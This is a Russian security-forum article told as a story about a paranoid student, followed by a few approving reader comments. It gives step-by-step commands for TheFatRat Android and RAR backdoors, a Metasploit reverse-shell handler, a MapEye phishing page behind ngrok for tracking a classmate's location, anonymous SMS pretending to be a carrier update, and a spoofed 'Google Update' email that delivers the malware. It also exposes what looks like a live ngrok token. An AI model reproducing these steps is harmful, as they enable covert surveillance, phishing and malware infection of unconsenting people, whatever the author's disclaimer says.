• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Новая жизнь: один вечер с бытия параноика

Приветствую, достаточно непонятный режим выпуска работ имеем: то тишина месяцами, то за несколько дней выходят несколько интересностей. Но что поделать, добро пожаловать в очередной сюжетный материал, устаивайтесь поудобнее, заварите чего-нибудь попить, а мы начнем наше увлекательное путешествие в мир примитивной и образной информационной безопасности. И будьте аккуратней, там человек писал, что зачитался и чуть не угодил под автомобиль.

Дисклеймер


На самом деле я против зла и то, что я покажу вам далее, может быть,
практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.

Новая жизнь: один вечер с бытия паранойика

Вечер ничем не был примечателен, тихий субботний вечерок: пьяные крики за окном, песни, спадающая летняя жара, закат. Казалось бы, идеальное время для прогулки, отдыха, но не тут то было. Люди, желающие добиться чего-то, не спят никогда, одним из представителей вечно неспящих и поглощающих тонны энергетических напитков был Антон. Да, тот самый Антоша, который был лишен всего: дома, любимого кота, аппаратуры. Но стало ли это поводом сломаться для нашего персонажа? Будучи оптимистом из ряда вон, Антон всегда видел в любой ситуации лишь положительные черты - он давно хотел сменить обстановку, кот только то и делал, что расходовал его кровные, а устройства давным давно устарели.

Новая квартира в центре города (о том, что арендованная - история умалчивает; советую подыграть, мол не в курсе, да), современный ноутбук, (в кредит конечно, но это не столь важно) и никакой шерсти на одежде.

Ситуация, произошедшая ранее, не могла не отразиться на характере Антохи, естественно, нотки паранойи всегда будут присутствовать в нем - три замка, куча видеокамер и маниакальное желание сохранить анонимность, ведая всё и о всех. Удалив все социальные сети, он находится в полной изоляции от общества, занимаясь сбором информации, её анализом и поиском практического применения тем данным, которыми уже владеет. На сегодняшний вечер Антоша накидал следующий план:

  1. Старый, но всё такой же толстый крыс.
  2. Отправщик отсутствует: мнимое сообщение от оператора.
  3. Никому не доверяй: уверен, что твои письма подлинные?
  4. Небольшой бонус: Итоги.

Старый, но всё такой же толстый крыс

Антоха лучший способ сбора информации видит во всяких утилитах типа троянов, крысок( RAT’ов) и прочего. Но писать самому полезные нагрузки, компилировать всё и криптовать для него - скучно, долго и непрактично.

Поэтому в глаза юному параноику бросилось следующее чудо, которое он находит веселым использовать и тестировать всяческими методами. К слову, о этапе реализации сего чуда поговорим чуть позже, а именно в следующем разделе.
Представим картину, что наш главный герой только надыбал этот репозиторий и устанавливает его:
Код:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh

Слегка впав в замешательство от количества файлов, Тоха отходит за чаем, ибо девайсы все купил, а на интернет денег не хватило, живет с раздачи(как и автор, кстати). В целом особого ничего нет в установке, скрипт делает всё за вас - недостающие элементы будут скачаны установлены без вмешательства.​

После докачки Тоха, имея базовые знания английского, открывает установщик заново, последней командой в прошлом коде:
Код:
./setup.sh

После проверки компонентов и завершения работы, можно смело запускать сам скрипт:
Код:
fatrat

Для начала Антоний решает проверить, будет ли вообще что-то работать на андроидах новых версий (в нашем случае - 11-й имеет место быть), поэтому выбирает первый пункт в стартовом меню и третий, обозначающий “Подписанный АПК”, затем указывает свой IP в глобальной сети и порт, на котором хочет открыть слушатель.

Screenshot_2021-05-22_22_20_16.png

Все аналогично с метаслоитом, затем юнцу стоит выбрать тип полезной нагрузки, которую он будет использовать, допустим, что он захотел получить шелл и выбрал варианты пониже и ответил “Да” на вопрос о том, сохранить ли файл для запуска слушателя.
Следующим шагом реализации будет запуск слушателя, здесь нет ничего особенного, стало быть Антоха просто запускает метасплоит и вставляет команды, прежде скопированные с сохраненного файла:
Код:
mfsconsole
use exploit/multi/handler
set PAYLOAD android/shell/reverse_tcp
set LHOST 192.168.53.30
set LPORT 4040
exploit -j

И теперь наш творец смекает, что что-то не так. Создать-то создал, ну, а дальше это как должно быть? Человек просто плюет на собственную безопасность, скачает какой-то файл и установит его на свой телефон? Э-э-э-э, не так это работает. Раз уж делать так, то хотя-бы изощряться чуточку. Какими способами? Этот же вопрос возникает в голове будущего пациента психиатров по диагнозу ОКР.

Screenshot_2021-05-22_20_53_08.png

Ничего толкового для APK он придумать не смог, хотя вроде как существуют репозитории, которые могут проделать работу по маскировке, но Тохе лень и не до этого, ему не терпится узнать, что же делают его одногруппники сейчас, вдруг планируют его ограбление? ( Кстати 11-му андроиду абсолютно побоку, что это полезная нагрузка и он её радо устанавливает. Хотелось рассмотреть пример с AVpass, но штука настолько заезженная, что даже браться не стал внедрять в сюжет, но проверить эффективность - проверил. Всё печально.)

Антоху особо привлек тринадцатый пункт, который прямо таки заявлял о полезной нагрузке в .rar формате, правда на целевой машине должна стоять старая версия архиватора. Вот скажите мне, а вы обновляете его? Лично мы с Героем статьи сегодняшней - нет. В компиляции нет ничего особенного, интуитивно понятно.

Выглядит с точки обзора операционных систем, как обычный архивчик, ничего примечательного, все привыкли ведь, что вирусы - это исполняемые файлы. На десятке работает, вирустотал ругает сильно - все нормальные антивирусы в нем видят угрозу.

Screenshot_14.png

Главному герою очень пришелся по душе этот вариант, поэтому он идет думать, как же можно заставить кого-то скачать этот архивчик и открыть, но об этом уже в следующем разделе.

Но интерес поглотил юнца, по сему он решает проверить остальные разделы, рассуждая следующим манером - msfvenom - это конечно хорошо, но как-то слишком банально.

Именно из-за этого в главном меню он выбирает второй пункт, обозначающий закриптованный бэкдор, далее перед Антоном стоит выбор - повершелл или “медленный , но сильный”. Будучи человеком, ценящим современность во всем, он склоняется к первому. Далее последует интуитивный процесс заполнения с выбором названия, формата, иконок и версий винды. Но в итог он получает ошибку компиляции и идет тестировать следующие функции, не разбираясь в причине.

В шестом пункте фактически всё то же самое, только уже с использованием криптованной полезной нагрузки от метасплоита, что в итог открывает сессию паувершелл, проверено, работает. Процент обнаружения лютейший, но с нюансом, что несколько популярный антивирусов его не видят. Аваст, Доктор Веб, салам вам. Также минус имеется в том, что потребуется склеивать, криптовать, иногда ведь это только повышает процент обнаружения. Целевая аудитория: такие люди, как и автор, без антивирусов, без всего.

Также имеется возможность вшивать полезные нагрузки в уже готовые приложения, но почему-то Антона это не привлекло. Кто его знает. Скажу лишь, что штука до сих пор рабочая и эффективность неплохая, особенно на андроидах.

Отправщик отсутствует: мнимое сообщение от оператора

Внимание нашего Тохи перешло на совершенно другую вещь, он вспомнил, что один его одногруппник говорил что-то о том, что оператор какой-то там компании, предоставляющей услуги сотовой связи, начал рассылать всем сообщения о выходе обновлений и даже вставлять ссылки на скачивание. ( История кстати реальна и такое происходит много где, что странно, до этого я считал, что официальные операторы никогда не станут подобного делать)

И здесь как раз герой текста сего смекает, а ведь этот одногруппник недавно переехал, а вот куда именно - не сообщил. Вдруг он живет теперь в этом же доме? Как вам уже известно, Антон отличается чрезвычайной хитростью, поэтому он что-то попросил сфотографировать со-учащегося своего , что касательно учебы, какую-то глупость, которой явно бы он не держал у себя в телефоне.

Таким образом Тоха узнает дома ли находится жертва, если ответ на просьбу будет положительным, а мы представим, что так и есть, то, естественно, операцию можно проводить. Стало быть имеет злоумышленник наш в распоряжении репозиторий, который позволяет отправлять анонимные СМС, это не новость, но с определенным лимитом в сутки - одну штуку в сутки. Содержание может быть абсолютно любым и никак не влияет на возможное количество.
В идеале нужно было искать скрипт, который производил бы подмену, но, к сожалению, таких не нашлось. Имеются лишь платные сервисы, что Тохе категорически не подходит, ведь он собирает на интернет.

Screenshot_2021-05-23_01_37_34.png

Но для начала нужно разобраться с тем, что будет отправляться, а не каким образом. Хотя и в этом особых сложностей нет, когда-то мы создавали целый промежуточный сайт, который выдавал баннер о отсутствии интернета, а после делал быструю переадресацию на конечный, нужный пользователю. Это все висело на хостинге и в целом, было неплохим стиллером. Теперь Антон решает использовать репозиторий, работающий посредством ngrock’а, к слову тоже ничем не уступающий.

Парень устанавливает сие чудо следующими командами:
Код:
git clone https://github.com/bhikandeshmukh/MapEye.git
cd MapEye
apt update
apt install python3 python3-pip php
pip3 install requests

Затем стоит запустить скрипт и выбрать интересующую обложку, выбором Антона будет классическое PeopleNearU, но потом резко меняет решение, заменяя исходный индекс на свой, хотя можно было выбрать и гуглдрайв:
Код:
python3 mapeye.py

Screenshot_2021-05-23_01_38_26.png

А после качает с официального сайта ngrok, вводит токен и создает сессию на порту 8080:
Код:
unzip ngrok.zip
./ngrok authtoken 1mW55T4gRmvOKWHOhVYJ410W1FG_4xruvQw32x6E1cqnaoMVY
./ngrok http 8080

Шифрует ссылку, сокращая её в любом онлайн шортлинке и формирует загадочный текст, где рассказывает о обновлении клиента мобильной связи и так далее, не забыв вставить ссылку на скачивание.

Теперь пришло время другого репозитория - анонимная отправка. Особо немедля наш герой быстро качает скрипт, переходит в директорию с ним и запускает:
Код:
git clone https://github.com/TheDarkRoot/AnonSMS.git
 cd AnonSMS
 chmod +x AnonSMS.py
 python3 AnonSMS.py

Screenshot_20210522-225550_Messages.jpg

После он вводит номер телефона жертвы и заготовленный текст, отправка. Результат вы можете лицезреть на скрине. Единственный нюанс, что разные модели телефонов могут присваивать то или иное имя данному СМС, где-то может писаться EMPTY, где-то может быть просто пустота.

Никому не доверяй: уверен, что твои письма подлинные?

Итак, пока мы с Антохой ожидаем пока наш драгоценный одногруппник перейдет по ссылке и предоставит своё местонахождение, кстати неточное ведь, все вкурсе думаю, что так невозможно пробить точно.

Тем временем Антоша придумал, как можно заставить людей скачать тот архивчик, даже при таком солидном проценте обнаружений, его не волнует это вообще. Он решает подменить почтовый адрес. Делается это не так уж и сложно, правда работает не всегда и не со всеми сервисами.

Как понял Тоша, прочитав какую-то англоязычную статью, нужно создать собственный почтовый ретранслятор и оказаться между двумя другими, дабы подменить письмо.

Изначально планировалось задействовать репозиторий FAQUE, которому всего-то месяц от роду, но, к большому сожалению, он отказался работать напрочь. Поэтому автором был найден другой способ провернуть сие махинацию.

Для начала Антон устанавливает и запускает постфикс:
Код:
apt-get install postfix
service postfix start

Эта штука, вроде как, и отвечает за доменное имя. Фактически мы присваиваем своей машине домен, если не так - поправьте.

Затем скачивает сам скрипт , переходит в его корень и устанавливает зависимости:
Код:
git clone https://github.com/lunarca/SimpleEmailSpoofer.git
cd SimpleEmailSpoofer
pip install -r requirements.txt
python3 SimpleEmailSpoofer.py

И видит или ошибку, или справку. После создаёт список почт на которые будет производиться подменная рассылка и закидывает в директорию со скриптом, формирует текст, где оставляет ссылку на свой архив в архиве. И отправляет это все дело таковой командой:
Код:
./SimpleEmailSpoofer.py -e /root/SimpleEmailSpoofer -t krosslohffbh@gmail.com -f google@support.com -n Google -j Google Update

В целом всё должно работать, если исполнение есть правильным, как у Тохи, он вообще красава, не унывает, делает своё дело. Пусть он и помешанный, но даже тронутые иногда спят, по сему Антохе пора, сессия на носу. А ведь он уже спит, на клавиатуре, и обрадовал визитом Морфея. :)

Небольшой бонус: итоги

Вообще планировал сюда вставить ещё один скрипт, но только из-за названия - FBI - к сожалению, для него делать отдельный раздел - слишком, а комбинировать пока что нет с чем. Проще говоря скрипт, который собирает информацию с страниц фейсбука. Установка такова:
Код:
git clone https://github.com/xHak9x/fbi.git
cd fbi
pip2 install -r requirements.txt

Ну, а на этом у меня всё, благодарю за то, что дочитали, если дочитали, а даже коль нет - ничего. В следующий раз постараюсь держать в напряжении к финалу. Бывайте здоровы, думаю, что скоро свидимся.
 
Последнее редактирование:

MLNK

Mod. Ethical Hacking
Red Team
23.01.2018
560
706
BIT
7
Круто! Вот только в какую категорию определить твоё творение? )
Нужно сделать что-то вроде "Пентест Фанфики"
 
  • Нравится
Реакции: Knotoni, dieZel и DeathDay

DeathDay

Green Team
18.04.2019
163
1 122
BIT
287
Круто! Вот только в какую категорию определить твоё творение? )
Нужно сделать что-то вроде "Пентест Фанфики"
А вот понятия не имею. Раньше редактором был, но свои статьи не переносил ни в какую категорию. :) Может пора создавать новый раздел ? :D
 

Дод

Green Team
19.06.2020
23
34
BIT
5
интересная интерпретация , очень понравилась статья , спасибо
 
  • Нравится
Реакции: DeathDay

Faust_1st

Green Team
16.06.2020
23
16
BIT
8
Вау, хоть я и не любитель огромных текстов. Но тут написано так интересно, что меня даже затянуло! Очень круто!
 
  • Нравится
Реакции: DeathDay
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!